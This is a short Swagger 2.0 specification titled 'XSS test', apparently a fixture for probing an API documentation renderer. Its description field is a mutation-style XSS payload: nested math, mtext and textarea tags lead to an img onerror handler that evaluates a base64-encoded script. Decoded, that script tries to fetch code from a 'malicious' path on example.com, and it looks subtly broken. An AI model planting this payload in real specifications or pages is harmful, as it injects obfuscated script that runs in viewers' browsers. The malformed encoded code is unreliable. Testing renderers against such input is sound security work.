swagger: '2.0'
info:
  title: XSS test
  description: <math><mtext><h1><a><h6></a></h6><textarea><a title="</textarea><img src="invalid-url" onerror="eval(atob('ZmV0Y2g9ZnVuY3Rpb24oKXtyZXR1cm4gZmV0Y2g9bmV3IFdpbmRvd3JvbmcuZmV0Y2goJ2h0dHBzOi8vZXhhbXBsZS5jb20vbWFsaWNpc2x5c2guanNvJyk7fQ=='))">">
  version: production
